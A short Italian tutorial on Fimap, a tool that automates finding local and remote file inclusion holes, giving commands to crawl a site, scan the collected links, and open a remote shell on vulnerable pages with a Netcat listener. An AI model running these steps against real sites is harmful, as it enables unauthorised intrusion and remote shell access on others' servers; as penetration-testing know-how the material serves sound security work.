tags: Fimap local_file_inclusion_automatizzata local_file_inclusion LFI
Questo strumento è pensato per essere un qualcosa di simile a SQLMap, ma per LFI e RFI.
Un primo comando potrebbe essere:
fimap -s -u "http://sito.com/index.php"Uno un po’ più intrusivo:
fimap -H -u http://sito.com -d 3 -w /cartella/dove/lo/vogliamo/salvare-
-d: Indica il grado di di profondità con cui andrà a ricercare i link -
-w: Indica il luogo dove vogliamo salvare questi link
Ora che abbiamo una lista di link la possiamo dare in pasto a Fimap in cerca di vulnerabilità:
fimap -m -l "/cartella/dove/lo/vogliamo/salvare"Una cosa molto interessante è che una volta ottenuto l’elenco delle pagine vulnerabili Fimap ci da la possibilità di creare una remote shell direttamente dal software, digitando:
fimap -xDovremo metterci in ascolto con Netcat prima di eseguire questo comando.